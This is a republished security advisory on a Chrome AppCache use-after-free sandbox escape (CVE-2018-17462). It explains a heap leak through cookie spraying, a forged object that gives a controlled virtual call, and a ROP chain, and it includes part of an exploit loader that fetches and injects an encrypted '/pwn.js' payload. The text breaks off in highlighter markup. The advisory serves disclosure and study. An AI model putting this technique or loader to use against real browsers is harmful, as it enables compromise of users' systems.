{"id":13714,"date":"2018-10-29T14:19:14","date_gmt":"2018-10-29T22:19:14","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7481\/"},"modified":"2018-10-29T14:19:14","modified_gmt":"2018-10-29T22:19:14","slug":"news-7481","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/10\/29\/news-7481\/","title":{"rendered":"SSD Advisory \u2013 Chrome AppCache Subsystem SBX by utilizing a Use After Free"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 29 Oct 2018 09:23:16 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The vulnerability exists in the AppCache subsystem in Chrome Versions 69.0 and before. This code is located in the privileged browser process outside of the sandbox. The renderer interacts with this subsystem by sending IPC messages from the renderer to the browser process. These messages can cause the browser to make network requests, which are also attacker-controlled and influence the behavior of the code.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Vendor has fixed the issue in Google Chrome version 70.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-17462<\/p>\n<p><strong>Credit<\/strong><br \/> Independent security researchers, Ned Williamson and\u00a0Niklas Baumstark, had reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Affected systems<\/strong><br \/> Google Chrome Versions 69.0 and before.<br \/> <span id=\"more-3786\"><\/span><br \/> <strong>Vulnerability Details<\/strong><br \/> The vulnerability exists in the AppCache subsystem in Chrome. The buggy code is accessible with IPC messages from the renderer process to the broker process.AppCache is a reference-counted object. It is possible to trigger the <strong>RemoveCache <\/strong>function while the object is being destructed, thus incrementing the reference-count of freed object by N.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis.png\" data-slb-active=\"1\" data-slb-asset=\"198103742\" data-slb-internal=\"0\" data-slb-group=\"3786\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-3787\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png\" alt=\"\" width=\"1188\" height=\"515\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-300x130.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-768x334.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/10\/Chrome-Sandbox-escape-Removecache-root-cause-analysis-1024x445.png 1024w\" sizes=\"auto, (max-width: 1188px) 100vw, 1188px\" \/><\/a><\/p>\n<p>Notice that <strong><em>newest_complete_cache<\/em><\/strong> is the destructed object. A fix is possible by calling <strong><em>CancelUpdate <\/em><\/strong>after setting the newest_complete_cache to be NULL.<\/p>\n<p>Further exploiting is achieved by decrementing an object reference-count to 0. Once a reference is taken to the object and being destroyed, the reference-count would reach 0 and the object would be freed, thus creating a stronger use-after-free. (should be called type confusion?)<\/p>\n<p><strong>Exploit<\/strong><br \/> This bug provides us two essential primitives: use-after-free decrement-by-N of the first dword of the freed object, where N is controlled. If in the process of decrementing, the first dword reaches 0, the AppCache destructor is called and the pointer is freed.<\/p>\n<p>We use these primitives in two stages: first, to construct a leak, and second, to trigger code execution. The freed AppCache object has size 0xA0 bytes. We found that <code>net::CanonicalCookie<\/code> has the same size, so we can spray cookies in the browser process by making a network request and including cookies in the response.<\/p>\n<p><code>std::string name<\/code> is the first object in the CanonicalCookie. This name is the key from the key\/value pair <code>name=value<\/code> from the cookie string. On Windows STL, the first qword of a std::string object is a pointer to the string data. By using decrement-by-N, we leak a number of bytes by reading the cookie back from the browser and scanning the <code>name<\/code> field. This leak gives us a heap address, which allows us to spray the heap and predictably place controlled data at a now-known address.<\/p>\n<p>To achieve code execution, we produce a single dangling reference to a freed AppCache via the described vulnerability. We reclaim it with a blob of the same size, forging a reference count of 1 and a fake AppCacheGroup with reference count 0. Once we remove the dangling reference and enter the AppCache destructor, the else branch of the RemoveCache method will cause the AppCacheGroup to be freed due to its reference count going from 0 to 1 and back to 0.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd78762144f5522704197\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> void AppCacheGroup::RemoveCache(AppCache* cache) {    DCHECK(cache-&gt;associated_hosts().empty());    if (cache == newest_complete_cache_) {      \/\/ &#8230;    } else {      scoped_refptr&lt;AppCacheGroup&gt; protect(this);      \/\/ &#8230;    }  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>The AppCacheGroup destructor in turn performs a virtual call, which<br \/> we fully control.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd78762144ff635731581\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> AppCacheGroup::~AppCacheGroup() {    \/\/ &#8230;    if (update_job_)      delete update_job_; \/\/ &lt;- code execution here  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bd78762144ff635731581-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd78762144ff635731581-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd78762144ff635731581-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd78762144ff635731581-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd78762144ff635731581-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bd78762144ff635731581-1\"><span class=\"crayon-v\">AppCacheGroup<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-o\">~<\/span><span class=\"crayon-e\">AppCacheGroup<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd78762144ff635731581-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ &#8230;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd78762144ff635731581-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">update_job_<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd78762144ff635731581-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">delete <\/span><span class=\"crayon-v\">update_job_<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/\/ &lt;- code execution here<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd78762144ff635731581-5\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<p>Due to the once-per-boot ASLR approach of Windows, all modules are loaded<br \/> at the same address in the renderer and broker process. We use a gadget<br \/> from __longjmp_internal to bootstrap the ROP. From there we can either<br \/> jump to shellcode or open notepad.<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bd7876214502952761154\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">JavaScript<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;head&gt;  &lt;title&gt;owning, please wait&#8230;&lt;\/title&gt;  &lt;style&gt;  body{background:white;font-size:0.8em;}  document{background:white;}  &lt;\/style&gt;  &lt;\/head&gt;  &lt;pre id=&#8221;progress&#8221;&gt;&lt;\/pre&gt;  &lt;pre id=&#8221;progress-rce&#8221;&gt;&lt;\/pre&gt;  &lt;pre id=&#8221;progress-infoleak&#8221;&gt;&lt;\/pre&gt;  &lt;pre id=&#8221;progress-rip&#8221;&gt;&lt;\/pre&gt;      &lt;script src=&#8221;crypto\/BigInteger.js&#8221;&gt;&lt;\/script&gt;  &lt;script src=&#8221;crypto\/aes.js&#8221;&gt;&lt;\/script&gt;    &lt;script&gt;  print = alert;    var g = bigInt(&#8220;115740200527109164239523414760926155534485715860090261532154107313946218459149402375178179458041461723723231563839316251515439564315555249353831328479173170684416728715378198172203100328308536292821245983596065287318698169565702979765910089654821728828592422299160041156491980943427556153020487552135890973413&#8221;);  var p = bigInt(&#8220;124325339146889384540494091085456630009856882741872806181731279018491820800119460022367403769795008250021191767583423221479185609066059226301250167164084041279837566626881119772675984258163062926954046545485368458404445166682380071370274810671501916789361956272226105723317679562001235501455748016154805420913&#8221;);  var bits = 1024;    var algo = {      &#8216;name&#8217;: &#8216;AES-CBC&#8217;,      &#8216;iv&#8217;: new Uint8Array(16),  };    function rand(bits) {      var a = new Uint8Array(Math.ceil(bits \/ 8));      window.crypto.getRandomValues(a);      var digits = [];      a.forEach((x) =&gt; digits.push(bigInt(x)));      return bigInt.fromArray(digits, 256, false);  }    async function aesDecrypt(s, cipher) {      var bytes = new Uint8Array(s.toArray(256).value          .map((x) =&gt; 0^x.toString()).slice(0, 16));        if (typeof crypto.subtle !== &#8216;undefined&#8217;) {          var key = await window.crypto.subtle.importKey(              &#8216;raw&#8217;, bytes, algo, false, [&#8216;decrypt&#8217;, &#8216;encrypt&#8217;]);          var plain = await window.crypto.subtle.decrypt(algo, key, cipher);      } else {          var aes = new aesjs.ModeOfOperation.cbc(bytes, algo.iv);          var plain = aes.decrypt(cipher);          var padLen = plain[plain.length &#8211; 1];          plain = plain.slice(0, plain.length &#8211; padLen);      }      return plain;  }    async function fetchDH(url, ascii = true) {      var a = rand(bits);      var A = g.modPow(a, p);      var res = await (await fetch(url + &#8216;?x=&#8217; + A.toString())).json();      var B = bigInt(res.B);      var s = B.modPow(a, p);      var cipher = new Uint8Array(res.result);      var buf = await aesDecrypt(s, cipher);      if (ascii)          return String.fromCharCode.apply(null, new Uint8Array(buf));      else          return buf;  }    async function go_enc() {      var js = await fetchDH(&#8216;\/pwn.js&#8217;);      var el = document.createElement(&#8216;script&#8217;);      el.innerHTML = js;      document.body.appendChild(el);  }    async function go_plain() {      var el = document.createElement(&#8216;script&#8217;);      el.setAttribute(&#8216;src&#8217;, &#8216;\/pwn.js&#8217;);      document.body.appendChild(el);  }    &lt;\/script&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bd7876214502952761154-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bd7876214502952761154-81\">81<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-1\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-2\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">owning<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">please <\/span><span class=\"crayon-v\">wait<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">title<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-3\"><span class=\"crayon-ta\">&lt;style&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-4\"><span class=\"crayon-k\">body<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-e\">background<\/span><span class=\"crayon-sy\">:<\/span><span class=\"crayon-i\">white<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-e\">font-size<\/span><span class=\"crayon-sy\">:<\/span><span class=\"crayon-i\">0.8em<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-5\"><span class=\"crayon-k\">document<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-e\">background<\/span><span class=\"crayon-sy\">:<\/span><span class=\"crayon-i\">white<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-6\"><span class=\"crayon-ta\">&lt;\/style&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-7\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">head<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-8\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;progress&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-9\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;progress-rce&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-10\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;progress-infoleak&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-11\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">pre <\/span><span class=\"crayon-e\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;progress-rip&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">pre<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7876214502952761154-14\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;crypto\/BigInteger.js&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7876214502952761154-15\"><span class=\"crayon-ta\">&lt;script <\/span><span 